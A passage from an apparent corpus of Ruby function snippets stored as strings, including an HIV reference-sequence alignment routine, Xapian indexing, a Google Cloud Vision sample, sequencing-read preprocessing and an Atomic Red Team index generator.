GGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACAAATAATCCACCTATCCCAGTAGGAGAAATTTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGGTTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAGGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGCGGCTACACTAGAAGAAATGATGACAGCATGTCAGGGAGTAGGAGGACCCGGCCATAAGGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATTCAGCTACCATAATGATGCAGAGAGGCAATTTTAGGAACCAAAGAAAGATTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACACAGCCAGAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCTACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTCTGGGGTAGAGACAACAACTCCCCCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAACTTCCCTCAGGTCACTCTTTGGCAACGACCCCTCGTCACAATAAAGATAGGGGGGCAACTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAGTTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGTGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGTTGCACTTTAAATTTTCCCATTAGCCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAGATGGAAAAGGAAGGGAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGACTTCTGGGAAGTTCAATTAGGAATACCACATCCCGCAGGGTTAAAAAAGAAAAAATCAGTAACAGTACTGGATGTGGGTGATGCATATTTTTCAGTTCCCTTAGATGAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAAAGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTTATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAGCTGAGACAACATCTGTTGAGGTGGGGACTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAAGACAGCTGGACTGTCAATGACATACAGAAGTTAGTGGGGAAATTGAATTGGGCAAGTCAGATTTACCCAGGGATTAAAGTAAGGCAATTATGTAAACTCCTTAGAGGAACCAAAGCACTAACAGAAGTAATACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGAGAGATTCTAAAAGAACCAGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAGGGGTGCCCACACTAATGATGTAAAACAATTAACAGAGGCAGTGCAAAAAATAACCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAACTGCCCATACAAAAGGAAACATGGGAAACATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTTAATACCCCTCCCTTAGTGAAATTATGGTACCAGTTAGAGAAAGAACCCATAGTAGGAGCAGAAACCTTCTATGTAGATGGGGCAGCTAACAGGGAGACTAAATTAGGAAAAGCAGGATATGTTACTAATAGAGGAAGACAAAAAGTTGTCACCCTAACTGACACAACAAATCAGAAGACTGAGTTACAAGCAATTTATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTAACAGACTCACAATATGCATTAGGAATCATTCAAGCACAACCAGATCAAAGTGAATCAGAGTTAGTCAATCAAATAATAGAGCAGTTAATAAAAAAGGAAAAGGTCTATCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATAAATTAGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGATGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTGCCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGAGAAGCCATGCATGGACAAGTAGACTGTAGTCCAGGAATATGGCAACTAGATTGTACACATTTAGAAGGAAAAGTTATCCTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTTATTCCAGCAGAAACAGGGCAGGAAACAGCATATTTTCTTTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAATACATACTGACAATGGCAGCAATTTCACCGGTGCTACGGTTAGGGCCGCCTGTTGGTGGGCGGGAATCAAGCAGGAATTTGGAATTCCCTACAATCCCCAAAGTCAAGGAGTAGTAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAAATCCACTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATTAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAGAACATGGAAAAGTTTAGTAAAACACCATATGTATGTTTCAGGGAAAGCTAGGGGATGGTTTTATAGACATCACTATGAAAGCCCTCATCCAAGAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAGATTGGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGAACTAGCAGACCAACTAATTCATCTGTATTACTTTGACTGTTTTTCAGACTCTGCTATAAGAAAGGCCTTATTAGGACACATAGTTAGCCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAATACTTGGCACTAGCAGCATTAATAACACCAAAAAAGATAAAGCCACCTTTGCCTAGTGTTACGAAACTGACAGAGGATAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCACACAATGAATGGACACTAGAGCTTTTAGAGGAGCTTAAGAATGAAGCTGTTAGACATTTTCCTAGGATTTGGCTCCATGGCTTAGGGCAACATATCTATGAAACTTATGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATAACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAACGCAACCTATACCAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAATATCAGCACTTGTGGAGATGGGGGTGGAGATGGGGCACCATGCTCCTTGGGATGTTGATGATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGGTAAGGTGCAGAAAGAATATGCATTTTTTTATAAACTTGATATAATACCAATAGATAATGATACTACCAGCTATAAGTTGACAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATTAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGAGGTAGTAATTAGATCTGTCAATTTCACGGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGAATCCGTATCCAGAGAGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATAACACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACCCTCCCATGCAGAATAAAACAAATTATAAACATGTGGCAGAAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACAGGGCTGCTATTAACAAGAGATGGTGGTAATAGCAACAATGAGTCCGAGATCTTCAGACCTGGAGGAGGAGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCGCAGCCTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGGTATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAGCAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATCACACGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAACCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTGGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAGCTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTAGTACAAGGAGCTTGTAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTACTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATAGGGTGGGAGCAGCATCTCGAGACCTGGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTACCAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAGGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGATAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGGATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCA\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/\" + head + \"_temp\"\n temp_aln = temp_dir + \"/\" + head + \"_temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n begin\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln = $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n #refine alignment\n\n if ref =~ /^(\\-+)/\n l1 = l1 - $1.size\n elsif ref =~ /(\\-+)$/\n l2 = l2 + $1.size\n end\n\n if (hxb2_l - l2 - 1) >= l1\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n ref_size = ref.size\n sim_count = 0\n (0..(ref_size-1)).each do |n|\n ref_base = ref[n]\n test_base = aln_test[n]\n sim_count += 1 if ref_base == test_base\n end\n similarity = (sim_count/ref_size.to_f*100).round(1)\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n loc_p1 = l1 + 1\n loc_p2 = hxb2_l - l2\n if seq.size != (loc_p2 - loc_p1 + 1)\n indel = true\n elsif aln_test.include?(\"-\")\n indel = true\n else\n indel = false\n end\n return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n else\n return [0,0,0,0,0,0,0]\n end\n rescue\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n return [0,0,0,0,0,0,0]\n end\nend",
"def index(data_path, db_path)\n db = Xapian::WritableDatabase.new(db_path, Xapian::DB_CREATE_OR_OPEN)\n term_generator = Xapian::TermGenerator.new\n term_generator.stemmer = Xapian::Stem.new('en')\n parse_csv_file(data_path).each do |row|\n doc = Xapian::Document.new\n term_generator.document = doc\n term_generator.index_text(row['TITLE'].to_s, 1, 'S')\n term_generator.index_text(row['DESCRIPTION'].to_s, 1, 'XD')\n term_generator.index_text(row['TITLE'].to_s)\n term_generator.increase_termpos\n term_generator.index_text(row['DESCRIPTION'].to_s)\n\n ### Start of new indexing code.\n # Index the MATERIALS field, splitting on semicolons.\n row['MATERIALS'].to_s.split(';').each do |material|\n material.strip!\n material.downcase!\n doc.add_boolean_term(\"XM#{material}\") if material.length.positive?\n end\n ### End of new indexing code.\n\n doc.data = row.to_h.to_json\n idterm = \"Q#{row['id_NUMBER']}\"\n doc.add_boolean_term(idterm)\n db.replace_document(idterm, doc)\n end\nend",
"def prune_index\n# missing_files=index_time_dbm_file.reject{|filename,itime| File.exists?(filename) && Picolena::IndexedDirectories.any?{|dir,alias_path| filename.starts_with?(dir)}}\n# missing_files.each{|filename, itime|\n# index.writer.delete(:complete_path, filename)\n# index_time_dbm_file.delete(filename)\n# logger.debug \"Removed : #{filename}\"\n# }\n# index.optimize\n end",
"def detect_pdf_gcs gcs_source_uri:, gcs_destination_uri:\n # [START vision_text_detection_pdf_gcs]\n # [START vision_text_detection_pdf_gcs_migration]\n # gcs_source_uri = \"Google Cloud Storage URI, eg. 'gs://my-bucket/example.pdf'\"\n # gcs_destination_uri = \"Google Cloud Storage URI, eg. 'gs://my-bucket/prefix_'\"\n\n require \"google/cloud/vision\"\n require \"google/cloud/storage\"\n\n image_annotator = Google::Cloud::Vision::ImageAnnotator.new\n\n operation = image_annotator.document_text_detection(\n image: gcs_source_uri,\n mime_type: \"application/pdf\",\n batch_size: 2,\n destination: gcs_destination_uri,\n async: true\n )\n\n puts \"Waiting for the operation to finish.\"\n operation.wait_until_done!\n # [END vision_text_detection_pdf_gcs_migration]\n\n # Once the request has completed and the output has been\n # written to GCS, we can list all the output files.\n storage = Google::Cloud::Storage.new\n\n bucket_name, prefix = gcs_destination_uri.match(\"gs://([^/]+)/(.+)\").captures\n bucket = storage.bucket bucket_name\n\n # List objects with the given prefix.\n puts \"Output files:\"\n blob_list = bucket.files prefix: prefix\n blob_list.each do |file|\n puts file.name\n end\n\n # Process the first output file from GCS.\n # Since we specified a batch_size of 2, the first response contains\n # the first two pages of the input file.\n output = blob_list[0]\n json_string = output.download\n response = JSON.parse json_string.string\n\n # The actual response for the first page of the input file.\n first_page_response = response[\"responses\"][0]\n annotation = first_page_response[\"fullTextAnnotation\"]\n\n # Here we print the full text from the first page.\n # The response contains more information:\n # annotation/pages/blocks/paragraphs/words/symbols\n # including confidence scores and bounding boxes\n puts \"Full text:\\n#{annotation['text']}\"\n # [END vision_text_detection_pdf_gcs]\nend",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def generate_index!(output_doc_path)\n result = ''\n\n ATTACK_API.techniques_by_tactic.each do |tactic, techniques|\n result += \"# #{tactic}\\n\"\n techniques.each do |technique|\n result += \"- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, true)}\\n\"\n ATOMIC_RED_TEAM.atomic_tests_for_technique(technique).each_with_index do |atomic_test, i|\n result += \" - Atomic Test ##{i+1}: #{atomic_test['name']}\\n\"\n end\n end\n result += \"\\n\"\n end\n\n File.write output_doc_path, result\n\n puts \"Generated Atomic Red Team index at #{output_doc_path}\"\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) or\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name, aai_medoids: \".aai-medoids.tsv\",\n haai_db: \".haai.db\", aai_db: \".aai.db\", ani_medoids: \".ani-medoids.tsv\",\n ani_db: \".ani.db\", ref_tree: \".nwk\", ref_tree_pdf: \".nwk.pdf\",\n intax_test: \".intax.txt\")\n end",
"def source_index \n @gsi = Gem::SourceIndex.from_gems_in(*Gem::SourceIndex.installed_spec_directories)\n end",
"def index_path\n @index_path ||= begin\n index_path = ENV['INDEX']\n index_path = Dir['indexes/*.json'].sort.last if index_path.blank?\n abort 'Need an INDEX=indexes/some_index.json' if index_path.blank?\n abort \"#{ index_path } is not a file\" unless File.file?(index_path)\n index_path\n end\nend",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def path_without_name_and_ref(path); end",
"def index_path(path)\n path ? path.chomp(File.extname(path)) + '.index' : nil\n end",
"def index\n @index ||= Gem::SourceIndex.from_gems_in File.join(path, \"specifications\")\n end",
